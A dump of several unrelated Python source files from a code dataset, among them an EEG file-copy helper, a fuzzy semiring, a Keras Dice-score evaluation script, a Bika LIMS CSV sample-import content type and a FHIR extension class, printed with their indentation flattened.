if fdt_ext != '.fdt':
raise IOError('Expected extension {} for linked data but found'
' {}'.format('.fdt', fdt_ext))
# Copy the fdt file and give it a new name
sh.copyfile(fdt_path, fname_dest + '.fdt')
# Now adjust the pointer in the set file
head, tail = op.split(fname_dest + '.fdt')
mat['EEG'][0][0]['data'] = tail
savemat(dest, mat, appendmat=False)
# If no .fdt file, simply copy the .set file, no modifications necessary
else:
sh.copyfile(src, dest)
def copyfile_bti(raw, dest):
"""Copy BTi data."""
pdf_fname = 'c,rfDC'
if raw.info['highpass'] is not None:
pdf_fname = 'c,rf%0.1fHz' % raw.info['highpass']
sh.copyfile(raw._init_kwargs['pdf_fname'],
op.join(dest, pdf_fname))
sh.copyfile(raw._init_kwargs['config_fname'],
op.join(dest, 'config'))
sh.copyfile(raw._init_kwargs['head_shape_fname'],
op.join(dest, 'hs_file'))
|
StarcoderdataPython
|
5060372
|
<reponame>DavidLlorens/algoritmia<gh_stars>1-10
from algoritmia.semirings.interfaces import IIdempotentSemiRing
class _FuzzySemiRing(IIdempotentSemiRing):
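    # Fuzzy-logic semiring over [0, 1]: "plus" is max and "times" is min,
    # with 0.0 and 1.0 as their respective identities.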
zero = property(lambda self: 0.0)
one = property(lambda self: 1.0)
def plus(self, left, right): return max(left, right)
def times(self, left, right): return min(left, right)
FuzzySemiRing = _FuzzySemiRing()#]full
|
StarcoderdataPython
|
4842435
|
from modelLib import *
from trainUtils import *
from keras.models import load_model
import customLoss as cl
import metrics as m
import keras
import keras.backend as K
# suppressing tensorflow messages
import tensorflow as tf
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
configTF = tf.ConfigProto()
configTF.gpu_options.allow_growth = True
sess = tf.Session(config=configTF)
tf.set_random_seed(1306)
np.random.seed(1306)
# database to use
dbPath = 'P:/dataset3_2d_onlyTumor_cropped_x-74-426_y-74-426_resized_224-224_clipped-0-1800_wavelet_scaled_val.hdf5'
db = h5py.File(dbPath, 'r')
X = db['slice'][...]
X = np.float32(X)
X = np.expand_dims(X, -1)
Y = db['mask'][...]
Y = np.expand_dims(Y, -1)
Y = np.float32(Y)
cases = db['case'][...]
tidx = list(range(0, X.shape[0])) # all
np.random.shuffle(tidx)
X = X[tidx, ...]
Y = Y[tidx, ...]
cases = cases[tidx, ...]
modelDir = '../models' # where models are saved
# models to use ensemble
modelName = ['maskNet002e_001']
# segmentation threshold
segThreshold = 0.2
YP = None
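# Average the predicted masks of every listed model (a simple ensemble); with a
# single entry in modelName this is just that model's own prediction.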
for mn in modelName:
modelFolder = os.path.join(modelDir,mn)
weightsFolder = os.path.join(modelFolder, "weights")
bestModelPath = os.path.join(weightsFolder, "best.hdf5")
model = load_model(bestModelPath,custom_objects={'log_dice_coef_loss': cl.log_dice_coef_loss, 'dice_coef_loss': cl.dice_coef_loss, 'dice_coef':cl.dice_coef})
if YP is None:
YP = model.predict(X, batch_size=50, verbose=1)
else:
YP += model.predict(X, batch_size=50, verbose=1)
K.clear_session()
YP = np.divide(YP, len(modelName))
# YP = unshuffle(YP,tidx)
dc = []
dc3D = []
for i in range(YP.shape[0]):
yp = YP[i,...]
ygt = Y[i,...]
if len(yp.shape) > 3:
dcSlice=[]
for j in range(yp.shape[2]):
cenp = yp[:,:,j,:]
gtp = ygt[:,:,j,:]
dcSlice.append(m.dice_coef(gtp,cenp,threshold=segThreshold))
dc.append(dcSlice)
dc3D.append(m.dice_coef(ygt, yp,threshold=segThreshold))
if len(yp.shape) > 3:
dc = np.array(dc)
print("Mean DC : \n")
print(np.mean(dc,axis=0))
dc3D = np.array(dc3D)
print("\nMean 3D DC : \n")
print(np.mean(dc3D))
'''
db = h5py.File( os.path.join('../predictedMasks','pred_' + dbName), mode='w')
db.create_dataset("slice", X.shape, X.dtype)
db.create_dataset("maskGT", Y.shape, Y.dtype)
db.create_dataset("maskPred", YP.shape, YP.dtype)
db.create_dataset("case", cases.shape, cases.dtype)
db['slice'][...] = X[...]
db['maskGT'][...] = Y[...]
db['maskPred'][...] = YP[...]
db['case'][...] = cases[...]
db.close()
k = 0
i = 2
while k != 'q':
x = np.expand_dims(X[i,:],0)
yp = np.array(YP[i,...])
yp = np.reshape(yp, (yp.shape[0], yp.shape[0]))
yp[yp < 0.5] = 0
yp[yp>=0.5] = 1
ygt = np.reshape(Y[i, :], (yp.shape[0], yp.shape[0]))
dc = K.eval(m.dice_coef(ygt,yp))
print("\nDice Coefficient : %f" % dc)
plt.subplot(121)
plt.imshow(yp)
plt.title("Predicted Mask")
plt.subplot(122)
plt.imshow(ygt)
plt.title("Ground Truth")
plt.show()
k = raw_input(" d = next, a = previous, q = quit ")
if k == 'd':
i += 1
i %= len(Y)
elif k == 'a':
i-=1
i = 0 if i<0 else i
'''
|
StarcoderdataPython
|
6400322
|
l1 = [1 , 2, 3]
l2 = [4 , 5, 6]
print(l1 , l2)
l2.insert(0, 4)  # insert the value 4 at index 0
l2.append(5)  # append a value at the end
l3 = l1 + l2  # concatenate
l1.extend(l2)  # concatenate in place
print(l3)
print(l1)
l4 = [ 5 , 6, 7, 8, 9]
del(l4[:2])
print(l4)
l4.pop()  # remove the last element
print(l4)
l5 = list(range(1,10))  # turn the range into a list with list()
print( l5)
m = ''
for v in l5:
m += str(v)
print(m)
|
StarcoderdataPython
|
3454984
|
from AccessControl import ClassSecurityInfo
import csv
from DateTime.DateTime import DateTime
from Products.Archetypes.event import ObjectInitializedEvent
from Products.CMFCore.WorkflowCore import WorkflowException
from bika.lims import bikaMessageFactory as _
from bika.lims.browser import ulocalized_time
from bika.lims.config import PROJECTNAME
from bika.lims.content.bikaschema import BikaSchema
from bika.lims.content.analysisrequest import schema as ar_schema
from bika.lims.content.sample import schema as sample_schema
from bika.lims.idserver import renameAfterCreation
from bika.lims.interfaces import IARImport, IClient
from bika.lims.utils import tmpID
from bika.lims.vocabularies import CatalogVocabulary
from collective.progressbar.events import InitialiseProgressBar
from collective.progressbar.events import ProgressBar
from collective.progressbar.events import ProgressState
from collective.progressbar.events import UpdateProgressEvent
from Products.Archetypes import atapi
from Products.Archetypes.public import *
from Products.Archetypes.references import HoldingReference
from Products.Archetypes.utils import addStatusMessage
from Products.CMFCore.utils import getToolByName
from Products.CMFPlone.utils import _createObjectByType
from Products.DataGridField import CheckboxColumn
from Products.DataGridField import Column
from Products.DataGridField import DataGridField
from Products.DataGridField import DataGridWidget
from Products.DataGridField import DateColumn
from Products.DataGridField import LinesColumn
from Products.DataGridField import SelectColumn
from zope import event
from zope.event import notify
from zope.i18nmessageid import MessageFactory
from zope.interface import implements
from bika.lims.browser.widgets import ReferenceWidget as bReferenceWidget
import sys
import transaction
_p = MessageFactory(u"plone")
OriginalFile = FileField(
'OriginalFile',
widget=ComputedWidget(
visible=False
),
)
Filename = StringField(
'Filename',
widget=StringWidget(
label=_('Original Filename'),
visible=True
),
)
NrSamples = StringField(
'NrSamples',
widget=StringWidget(
label=_('Number of samples'),
visible=True
),
)
ClientName = StringField(
'ClientName',
searchable=True,
widget=StringWidget(
label=_("Client Name"),
),
)
ClientID = StringField(
'ClientID',
searchable=True,
widget=StringWidget(
label=_('Client ID'),
),
)
ClientOrderNumber = StringField(
'ClientOrderNumber',
searchable=True,
widget=StringWidget(
label=_('Client Order Number'),
),
)
ClientReference = StringField(
'ClientReference',
searchable=True,
widget=StringWidget(
label=_('Client Reference'),
),
)
Contact = ReferenceField(
'Contact',
allowed_types=('Contact',),
relationship='ARImportContact',
default_method='getContactUIDForUser',
referenceClass=HoldingReference,
vocabulary_display_path_bound=sys.maxint,
widget=ReferenceWidget(
label=_('Primary Contact'),
size=20,
visible=True,
base_query={'inactive_state': 'active'},
showOn=True,
popup_width='300px',
colModel=[{'columnName': 'UID', 'hidden': True},
{'columnName': 'Fullname', 'width': '100',
'label': _('Name')}],
),
)
Batch = ReferenceField(
'Batch',
allowed_types=('Batch',),
relationship='ARImportBatch',
widget=bReferenceWidget(
label=_('Batch'),
visible=True,
catalog_name='bika_catalog',
base_query={'review_state': 'open', 'cancellation_state': 'active'},
showOn=True,
),
)
CCContacts = DataGridField(
'CCContacts',
allow_insert=False,
allow_delete=False,
allow_reorder=False,
allow_empty_rows=False,
columns=('CCNamesReport',
'CCEmailsReport',
'CCNamesInvoice',
'CCEmailsInvoice'),
default=[{'CCNamesReport': [],
'CCEmailsReport': [],
'CCNamesInvoice': [],
'CCEmailsInvoice': []
}],
widget=DataGridWidget(
columns={
'CCNamesReport': LinesColumn('Report CC Contacts'),
'CCEmailsReport': LinesColumn('Report CC Emails'),
'CCNamesInvoice': LinesColumn('Invoice CC Contacts'),
'CCEmailsInvoice': LinesColumn('Invoice CC Emails')
}
)
)
SampleData = DataGridField(
'SampleData',
allow_insert=True,
allow_delete=True,
allow_reorder=False,
allow_empty_rows=False,
allow_oddeven=True,
columns=('ClientSampleID',
'SamplingDate',
'DateSampled',
'SamplePoint',
'SampleMatrix',
'SampleType', # not a schema field!
'ContainerType', # not a schema field!
'ReportDryMatter',
'Priority',
'Analyses', # not a schema field!
'Profiles' # not a schema field!
),
widget=DataGridWidget(
label=_('Samples'),
columns={
'ClientSampleID': Column('Sample ID'),
'SamplingDate': DateColumn('Sampling Date'),
'DateSampled': DateColumn('Date Sampled'),
'SamplePoint': SelectColumn(
'Sample Point', vocabulary='Vocabulary_SamplePoint'),
'SampleMatrix': SelectColumn(
'Sample Matrix', vocabulary='Vocabulary_SampleMatrix'),
'SampleType': SelectColumn(
'Sample Type', vocabulary='Vocabulary_SampleType'),
'ContainerType': SelectColumn(
'Container', vocabulary='Vocabulary_ContainerType'),
'ReportDryMatter': CheckboxColumn('Dry'),
'Priority': SelectColumn(
'Priority', vocabulary='Vocabulary_Priority'),
'Analyses': LinesColumn('Analyses'),
'Profiles': LinesColumn('Profiles'),
}
)
)
Errors = LinesField(
'Errors',
widget=LinesWidget(
label=_('Errors'),
rows=10,
)
)
schema = BikaSchema.copy() + Schema((
OriginalFile,
Filename,
NrSamples,
ClientName,
ClientID,
ClientOrderNumber,
ClientReference,
Contact,
CCContacts,
Batch,
SampleData,
Errors,
))
schema['title'].validators = ()
# Update the validation layer after change the validator in runtime
schema['title']._validationLayer()
class ARImport(BaseFolder):
security = ClassSecurityInfo()
schema = schema
displayContentsTab = False
implements(IARImport)
_at_rename_after_creation = True
def _renameAfterCreation(self, check_auto_id=False):
renameAfterCreation(self)
def guard_validate_transition(self):
"""We may only attempt validation if file data has been uploaded.
"""
data = self.getOriginalFile()
if data and len(data):
return True
def workflow_before_validate(self):
"""This function transposes values from the provided file into the
ARImport object's fields, and checks for invalid values.
If errors are found:
- Validation transition is aborted.
- Errors are stored on object and displayed to user.
"""
# Re-set the errors on this ARImport each time validation is attempted.
# When errors are detected they are immediately appended to this field.
self.setErrors([])
self.validate_headers()
self.validate_samples()
if self.getErrors():
addStatusMessage(self.REQUEST, _p('Validation errors.'), 'error')
transaction.commit()
self.REQUEST.response.write(
'<script>document.location.href="%s/edit"</script>' % (
self.absolute_url()))
self.REQUEST.response.write(
'<script>document.location.href="%s/view"</script>' % (
self.absolute_url()))
def at_post_edit_script(self):
workflow = getToolByName(self, 'portal_workflow')
trans_ids = [t['id'] for t in workflow.getTransitionsFor(self)]
if 'validate' in trans_ids:
workflow.doActionFor(self, 'validate')
def workflow_script_import(self):
"""Create objects from valid ARImport
"""
bsc = getToolByName(self, 'bika_setup_catalog')
workflow = getToolByName(self, 'portal_workflow')
client = self.aq_parent
title = _('Submitting AR Import')
description = _('Creating and initialising objects')
bar = ProgressBar(self, self.REQUEST, title, description)
notify(InitialiseProgressBar(bar))
profiles = [x.getObject() for x in bsc(portal_type='AnalysisProfile')]
gridrows = self.schema['SampleData'].get(self)
row_cnt = 0
for therow in gridrows:
row = therow.copy()
row_cnt += 1
# Create Sample
sample = _createObjectByType('Sample', client, tmpID())
sample.unmarkCreationFlag()
# First convert all row values into something the field can take
sample.edit(**row)
sample._renameAfterCreation()
event.notify(ObjectInitializedEvent(sample))
sample.at_post_create_script()
swe = self.bika_setup.getSamplingWorkflowEnabled()
if swe:
workflow.doActionFor(sample, 'sampling_workflow')
else:
workflow.doActionFor(sample, 'no_sampling_workflow')
part = _createObjectByType('SamplePartition', sample, 'part-1')
part.unmarkCreationFlag()
if swe:
workflow.doActionFor(part, 'sampling_workflow')
else:
workflow.doActionFor(part, 'no_sampling_workflow')
# Container is special... it could be a containertype.
container = self.get_row_container(row)
if container:
if container.portal_type == 'ContainerType':
containers = container.getContainers()
# XXX And so we must calculate the best container for this partition
part.edit(Container=containers[0])
# Profiles are titles, profile keys, or UIDS: convert them to UIDs.
newprofiles = []
for title in row['Profiles']:
objects = [x for x in profiles
if title in (x.getProfileKey(), x.UID(), x.Title())]
for obj in objects:
newprofiles.append(obj.UID())
row['Profiles'] = newprofiles
# BBB in bika.lims < 3.1.9, only one profile is permitted
# on an AR. The services are all added, but only first selected
# profile name is stored.
row['Profile'] = newprofiles[0] if newprofiles else None
# Same for analyses
newanalyses = set(self.get_row_services(row) +
self.get_row_profile_services(row))
row['Analyses'] = []
# get batch
batch = self.schema['Batch'].get(self)
if batch:
row['Batch'] = batch
# Add AR fields from schema into this row's data
row['ClientReference'] = self.getClientReference()
row['ClientOrderNumber'] = self.getClientOrderNumber()
row['Contact'] = self.getContact()
# Create AR
ar = _createObjectByType("AnalysisRequest", client, tmpID())
ar.setSample(sample)
ar.unmarkCreationFlag()
ar.edit(**row)
ar._renameAfterCreation()
for analysis in ar.getAnalyses(full_objects=True):
analysis.setSamplePartition(part)
ar.at_post_create_script()
if swe:
workflow.doActionFor(ar, 'sampling_workflow')
else:
workflow.doActionFor(ar, 'no_sampling_workflow')
ar.setAnalyses(list(newanalyses))
progress_index = float(row_cnt) / len(gridrows) * 100
progress = ProgressState(self.REQUEST, progress_index)
notify(UpdateProgressEvent(progress))
# document has been written to, and redirect() fails here
self.REQUEST.response.write(
'<script>document.location.href="%s"</script>' % (
self.absolute_url()))
def get_header_values(self):
"""Scrape the "Header" values from the original input file
"""
lines = self.getOriginalFile().data.splitlines()
reader = csv.reader(lines)
header_fields = header_data = []
for row in reader:
if not any(row):
continue
if row[0].strip().lower() == 'header':
header_fields = [x.strip() for x in row][1:]
continue
if row[0].strip().lower() == 'header data':
header_data = [x.strip() for x in row][1:]
break
if not (header_data or header_fields):
return None
if not (header_data and header_fields):
self.error("File is missing header row or header data")
return None
# inject us out of here
values = dict(zip(header_fields, header_data))
# blank cell from sheet will probably make it in here:
if '' in values:
del (values[''])
return values
def save_header_data(self):
"""Save values from the file's header row into their schema fields.
"""
client = self.aq_parent
headers = self.get_header_values()
if not headers:
return False
# Plain header fields that can be set into plain schema fields:
for h, f in [
('File name', 'Filename'),
('No of Samples', 'NrSamples'),
('Client name', 'ClientName'),
('Client ID', 'ClientID'),
('Client Order Number', 'ClientOrderNumber'),
('Client Reference', 'ClientReference')
]:
v = headers.get(h, None)
if v:
field = self.schema[f]
field.set(self, v)
del (headers[h])
# Primary Contact
v = headers.get('Contact', None)
contacts = [x for x in client.objectValues('Contact')]
contact = [c for c in contacts if c.Title() == v]
if contact:
self.schema['Contact'].set(self, contact)
else:
self.error("Specified contact '%s' does not exist; using '%s'"%
(v, contacts[0].Title()))
self.schema['Contact'].set(self, contacts[0])
del (headers['Contact'])
# CCContacts
field_value = {
'CCNamesReport': '',
'CCEmailsReport': '',
'CCNamesInvoice': '',
'CCEmailsInvoice': ''
}
for h, f in [
# csv header name DataGrid Column ID
('CC Names - Report', 'CCNamesReport'),
('CC Emails - Report', 'CCEmailsReport'),
('CC Names - Invoice', 'CCNamesInvoice'),
('CC Emails - Invoice', 'CCEmailsInvoice'),
]:
if h in headers:
values = [x.strip() for x in headers.get(h, '').split(",")]
field_value[f] = values if values else ''
del (headers[h])
self.schema['CCContacts'].set(self, [field_value])
if headers:
unexpected = ','.join(headers.keys())
self.error("Unexpected header fields: %s" % unexpected)
def get_sample_values(self):
"""Read the rows specifying Samples and return a dictionary with
related data.
keys are:
headers - row with "Samples" in column 0. These headers are
used as dictionary keys in the rows below.
prices - Row with "Analysis Price" in column 0.
            total_analyses - Row with "Total analyses" in column 0
price_totals - Row with "Total price excl Tax" in column 0
samples - All other sample rows.
"""
res = {'samples': []}
lines = self.getOriginalFile().data.splitlines()
reader = csv.reader(lines)
next_rows_are_sample_rows = False
for row in reader:
if not any(row):
continue
if next_rows_are_sample_rows:
vals = [x.strip() for x in row]
if not any(vals):
continue
res['samples'].append(zip(res['headers'], vals))
elif row[0].strip().lower() == 'samples':
res['headers'] = [x.strip() for x in row]
elif row[0].strip().lower() == 'analysis price':
res['prices'] = \
zip(res['headers'], [x.strip() for x in row])
elif row[0].strip().lower() == 'total analyses':
res['total_analyses'] = \
zip(res['headers'], [x.strip() for x in row])
elif row[0].strip().lower() == 'total price excl tax':
res['price_totals'] = \
zip(res['headers'], [x.strip() for x in row])
next_rows_are_sample_rows = True
return res
def save_sample_data(self):
"""Save values from the file's header row into the DataGrid columns
after doing some very basic validation
"""
bsc = getToolByName(self, 'bika_setup_catalog')
        keywords = bsc.uniqueValuesFor('getKeyword')
profiles = []
for p in bsc(portal_type='AnalysisProfile'):
p = p.getObject()
profiles.append(p.Title())
profiles.append(p.getProfileKey())
sample_data = self.get_sample_values()
if not sample_data:
return False
# columns that we expect, but do not find, are listed here.
# we report on them only once, after looping through sample rows.
missing = set()
# This contains all sample header rows that were not handled
# by this code
unexpected = set()
# Save other errors here instead of sticking them directly into
# the field, so that they show up after MISSING and before EXPECTED
errors = []
# This will be the new sample-data field value, when we are done.
grid_rows = []
row_nr = 0
for row in sample_data['samples']:
row = dict(row)
row_nr += 1
# sid is just for referring the user back to row X in their
            # input spreadsheet
gridrow = {'sid': row['Samples']}
del (row['Samples'])
# We'll use this later to verify the number against selections
if 'Total number of Analyses or Profiles' in row:
nr_an = row['Total number of Analyses or Profiles']
del (row['Total number of Analyses or Profiles'])
else:
nr_an = 0
try:
nr_an = int(nr_an)
except ValueError:
nr_an = 0
            # TODO this is ignored and is probably meant to serve some purpose.
            if 'Price excl Tax' in row:
                del (row['Price excl Tax'])
# ContainerType - not part of sample or AR schema
if 'ContainerType' in row:
title = row['ContainerType']
if title:
obj = self.lookup(('ContainerType',),
Title=row['ContainerType'])
if obj:
gridrow['ContainerType'] = obj[0].UID
del (row['ContainerType'])
if 'SampleMatrix' in row:
# SampleMatrix - not part of sample or AR schema
title = row['SampleMatrix']
if title:
obj = self.lookup(('SampleMatrix',),
Title=row['SampleMatrix'])
if obj:
gridrow['SampleMatrix'] = obj[0].UID
del (row['SampleMatrix'])
# match against sample schema
for k, v in row.items():
if k in ['Analyses', 'Profiles']:
continue
if k in sample_schema:
del (row[k])
if v:
try:
value = self.munge_field_value(
sample_schema, row_nr, k, v)
gridrow[k] = value
except ValueError as e:
errors.append(e.message)
# match against ar schema
for k, v in row.items():
if k in ['Analyses', 'Profiles']:
continue
if k in ar_schema:
del (row[k])
if v:
try:
value = self.munge_field_value(
ar_schema, row_nr, k, v)
gridrow[k] = value
except ValueError as e:
errors.append(e.message)
# Count and remove Keywords and Profiles from the list
gridrow['Analyses'] = []
for k, v in row.items():
if k in keywords:
del (row[k])
if str(v).strip().lower() not in ('', '0', 'false'):
gridrow['Analyses'].append(k)
gridrow['Profiles'] = []
for k, v in row.items():
if k in profiles:
del (row[k])
if str(v).strip().lower() not in ('', '0', 'false'):
gridrow['Profiles'].append(k)
if len(gridrow['Analyses']) + len(gridrow['Profiles']) != nr_an:
errors.append(
"Row %s: Number of analyses does not match provided value" %
row_nr)
grid_rows.append(gridrow)
self.setSampleData(grid_rows)
if missing:
self.error("SAMPLES: Missing expected fields: %s" %
','.join(missing))
for thing in errors:
self.error(thing)
if unexpected:
self.error("Unexpected header fields: %s" %
','.join(unexpected))
def get_batch_header_values(self):
"""Scrape the "Batch Header" values from the original input file
"""
lines = self.getOriginalFile().data.splitlines()
reader = csv.reader(lines)
batch_headers = batch_data = []
for row in reader:
if not any(row):
continue
if row[0].strip().lower() == 'batch header':
batch_headers = [x.strip() for x in row][1:]
continue
if row[0].strip().lower() == 'batch data':
batch_data = [x.strip() for x in row][1:]
break
if not (batch_data or batch_headers):
return None
if not (batch_data and batch_headers):
self.error("Missing batch headers or data")
return None
        # Build a dict mapping each batch header field to its data value
values = dict(zip(batch_headers, batch_data))
return values
def create_or_reference_batch(self):
"""Save reference to batch, if existing batch specified
Create new batch, if possible with specified values
"""
client = self.aq_parent
batch_headers = self.get_batch_header_values()
if not batch_headers:
return False
# if the Batch's Title is specified and exists, no further
# action is required. We will just set the Batch field to
# use the existing object.
batch_title = batch_headers.get('title', False)
if batch_title:
existing_batch = [x for x in client.objectValues('Batch')
if x.title == batch_title]
if existing_batch:
self.setBatch(existing_batch[0])
return existing_batch[0]
# If the batch title is specified but does not exist,
        # we will attempt to create the batch now.
if 'title' in batch_headers:
if 'id' in batch_headers:
del (batch_headers['id'])
if '' in batch_headers:
del (batch_headers[''])
batch = _createObjectByType('Batch', client, tmpID())
batch.processForm()
batch.edit(**batch_headers)
self.setBatch(batch)
def munge_field_value(self, schema, row_nr, fieldname, value):
"""Convert a spreadsheet value into a field value that fits in
the corresponding schema field.
- boolean: All values are true except '', 'false', or '0'.
- reference: The title of an object in field.allowed_types;
returns a UID or list of UIDs
- datetime: returns a string value from ulocalized_time
        Though this is only used during "Saving" of csv data into schema fields,
it will flag 'validation' errors, as this is the only chance we will
get to complain about these field values.
"""
field = schema[fieldname]
if field.type == 'boolean':
value = str(value).strip().lower()
            value = '' if value in ['', '0', 'no', 'false', 'none'] else '1'
return value
if field.type == 'reference':
value = str(value).strip()
brains = self.lookup(field.allowed_types, Title=value)
if not brains:
brains = self.lookup(field.allowed_types, UID=value)
if not brains:
raise ValueError('Row %s: value is invalid (%s=%s)' % (
row_nr, fieldname, value))
if field.multiValued:
return [b.UID for b in brains] if brains else []
else:
return brains[0].UID if brains else None
if field.type == 'datetime':
try:
value = DateTime(value)
return ulocalized_time(
value, long_format=True, time_only=False, context=self)
            except Exception:
raise ValueError('Row %s: value is invalid (%s=%s)' % (
row_nr, fieldname, value))
return str(value)
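    # Illustrative sketch (not part of the original source) of what
    # munge_field_value() produces per field type; the sample values are
    # hypothetical and only serve as examples:
    #
    #   boolean   'No'         -> ''   (falsy), 'Yes' -> '1' (truthy)
    #   reference 'Water'      -> UID of the object titled 'Water' in
    #                             field.allowed_types (a list of UIDs if
    #                             the field is multiValued)
    #   datetime  '2015-01-30' -> localized string from ulocalized_time
    #
    # Unknown reference titles/UIDs and unparseable dates raise ValueError,
    # which save_sample_data() collects into its error list.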
def validate_headers(self):
"""Validate headers fields from schema
"""
pc = getToolByName(self, 'portal_catalog')
pu = getToolByName(self, "plone_utils")
client = self.aq_parent
# Verify Client Name
if self.getClientName() != client.Title():
self.error("%s: value is invalid (%s)." % (
'Client name', self.getClientName()))
# Verify Client ID
if self.getClientID() != client.getClientID():
self.error("%s: value is invalid (%s)." % (
'Client ID', self.getClientID()))
existing_arimports = pc(portal_type='ARImport',
review_state=['valid', 'imported'])
# Verify Client Order Number
for arimport in existing_arimports:
if arimport.UID == self.UID() \
or not arimport.getClientOrderNumber():
continue
arimport = arimport.getObject()
if arimport.getClientOrderNumber() == self.getClientOrderNumber():
self.error('%s: already used by existing ARImport.' %
'ClientOrderNumber')
break
# Verify Client Reference
for arimport in existing_arimports:
if arimport.UID == self.UID() \
or not arimport.getClientReference():
continue
arimport = arimport.getObject()
if arimport.getClientReference() == self.getClientReference():
self.error('%s: already used by existing ARImport.' %
'ClientReference')
break
# getCCContacts has no value if object is not complete (eg during test)
if self.getCCContacts():
cc_contacts = self.getCCContacts()[0]
contacts = [x for x in client.objectValues('Contact')]
contact_names = [c.Title() for c in contacts]
# validate Contact existence in this Client
for k in ['CCNamesReport', 'CCNamesInvoice']:
for val in cc_contacts[k]:
if val and val not in contact_names:
self.error('%s: value is invalid (%s)' % (k, val))
else:
cc_contacts = {'CCNamesReport': [],
'CCEmailsReport': [],
'CCNamesInvoice': [],
'CCEmailsInvoice': []
}
# validate Contact existence in this Client
for k in ['CCEmailsReport', 'CCEmailsInvoice']:
for val in cc_contacts.get(k, []):
if val and not pu.validateSingleNormalizedEmailAddress(val):
self.error('%s: value is invalid (%s)' % (k, val))
def validate_samples(self):
"""Scan through the SampleData values and make sure
that each one is correct
"""
bsc = getToolByName(self, 'bika_setup_catalog')
keywords = bsc.uniqueValuesFor('getKeyword')
profiles = []
for p in bsc(portal_type='AnalysisProfile'):
p = p.getObject()
profiles.append(p.Title())
profiles.append(p.getProfileKey())
row_nr = 0
for gridrow in self.getSampleData():
row_nr += 1
# validate against sample and ar schemas
for k, v in gridrow.items():
                if k in ['Analyses', 'Profiles']:
                    continue
if k in sample_schema:
try:
self.validate_against_schema(
sample_schema, row_nr, k, v)
continue
except ValueError as e:
self.error(e.message)
break
if k in ar_schema:
try:
self.validate_against_schema(
ar_schema, row_nr, k, v)
except ValueError as e:
self.error(e.message)
an_cnt = 0
for v in gridrow['Analyses']:
if v and v not in keywords:
self.error("Row %s: value is invalid (%s=%s)" %
('Analysis keyword', row_nr, v))
else:
an_cnt += 1
for v in gridrow['Profiles']:
if v and v not in profiles:
self.error("Row %s: value is invalid (%s=%s)" %
('Profile Title', row_nr, v))
else:
an_cnt += 1
if not an_cnt:
self.error("Row %s: No valid analyses or profiles" % row_nr)
def validate_against_schema(self, schema, row_nr, fieldname, value):
"""
"""
field = schema[fieldname]
if field.type == 'boolean':
value = str(value).strip().lower()
return value
if field.type == 'reference':
value = str(value).strip()
if field.required and not value:
raise ValueError("Row %s: %s field requires a value" % (
row_nr, fieldname))
if not value:
return value
brains = self.lookup(field.allowed_types, UID=value)
if not brains:
raise ValueError("Row %s: value is invalid (%s=%s)" % (
row_nr, fieldname, value))
if field.multiValued:
return [b.UID for b in brains] if brains else []
else:
return brains[0].UID if brains else None
if field.type == 'datetime':
try:
ulocalized_time(DateTime(value), long_format=True,
time_only=False, context=self)
            except Exception:
raise ValueError('Row %s: value is invalid (%s=%s)' % (
row_nr, fieldname, value))
return value
def lookup(self, allowed_types, **kwargs):
"""Lookup an object of type (allowed_types). kwargs is sent
directly to the catalog.
"""
at = getToolByName(self, 'archetype_tool')
for portal_type in allowed_types:
catalog = at.catalog_map.get(portal_type, [None])[0]
catalog = getToolByName(self, catalog)
kwargs['portal_type'] = portal_type
brains = catalog(**kwargs)
if brains:
return brains
def get_row_services(self, row):
"""Return a list of services which are referenced in Analyses.
values may be UID, Title or Keyword.
"""
bsc = getToolByName(self, 'bika_setup_catalog')
services = set()
for val in row.get('Analyses', []):
brains = bsc(portal_type='AnalysisService', getKeyword=val)
if not brains:
brains = bsc(portal_type='AnalysisService', title=val)
if not brains:
brains = bsc(portal_type='AnalysisService', UID=val)
if brains:
services.add(brains[0].UID)
else:
self.error("Invalid analysis specified: %s" % val)
return list(services)
def get_row_profile_services(self, row):
"""Return a list of services which are referenced in profiles
values may be UID, Title or ProfileKey.
"""
bsc = getToolByName(self, 'bika_setup_catalog')
services = set()
profiles = [x.getObject() for x in bsc(portal_type='AnalysisProfile')]
for val in row.get('Profiles', []):
objects = [x for x in profiles
if val in (x.getProfileKey(), x.UID(), x.Title())]
if objects:
for service in objects[0].getService():
services.add(service.UID())
else:
self.error("Invalid profile specified: %s" % val)
return list(services)
def get_row_container(self, row):
"""Return a sample container
"""
bsc = getToolByName(self, 'bika_setup_catalog')
val = row.get('Container', False)
if val:
brains = bsc(portal_type='Container', UID=row['Container'])
            if brains:
                return brains[0].getObject()
brains = bsc(portal_type='ContainerType', UID=row['Container'])
if brains:
# XXX Cheating. The calculation of capacity vs. volume is not done.
return brains[0].getObject()
return None
def get_row_profiles(self, row):
bsc = getToolByName(self, 'bika_setup_catalog')
profiles = []
for profile_title in row.get('Profiles', []):
profile = bsc(portal_type='AnalysisProfile', title=profile_title)
profiles.append(profile)
return profiles
def Vocabulary_SamplePoint(self):
vocabulary = CatalogVocabulary(self)
vocabulary.catalog = 'bika_setup_catalog'
folders = [self.bika_setup.bika_samplepoints]
if IClient.providedBy(self.aq_parent):
folders.append(self.aq_parent)
return vocabulary(allow_blank=True, portal_type='SamplePoint')
def Vocabulary_SampleMatrix(self):
vocabulary = CatalogVocabulary(self)
vocabulary.catalog = 'bika_setup_catalog'
return vocabulary(allow_blank=True, portal_type='SampleMatrix')
def Vocabulary_SampleType(self):
vocabulary = CatalogVocabulary(self)
vocabulary.catalog = 'bika_setup_catalog'
folders = [self.bika_setup.bika_sampletypes]
if IClient.providedBy(self.aq_parent):
folders.append(self.aq_parent)
return vocabulary(allow_blank=True, portal_type='SampleType')
def Vocabulary_ContainerType(self):
vocabulary = CatalogVocabulary(self)
vocabulary.catalog = 'bika_setup_catalog'
return vocabulary(allow_blank=True, portal_type='ContainerType')
def Vocabulary_Priority(self):
vocabulary = CatalogVocabulary(self)
vocabulary.catalog = 'bika_setup_catalog'
return vocabulary(allow_blank=True, portal_type='ARPriority')
def error(self, msg):
errors = list(self.getErrors())
errors.append(msg)
self.setErrors(errors)
atapi.registerType(ARImport, PROJECTNAME)
|
StarcoderdataPython
|
3444077
|
<reponame>imranq2/SparkAutoMapper.FHIR
from typing import Optional
from spark_auto_mapper_fhir.extensions.extension_base import ExtensionBase
from spark_auto_mapper_fhir.fhir_types.date_time import FhirDateTime
from spark_auto_mapper_fhir.fhir_types.string import FhirString
class BaseExtensionItem(ExtensionBase):
# noinspection PyPep8Naming
def __init__(
self,
url: str,
valueString: Optional[FhirString] = None,
valueDateTime: Optional[FhirDateTime] = None,
include_null_properties: bool = True,
) -> None:
super().__init__(url=url, valueString=valueString, valueDateTime=valueDateTime)
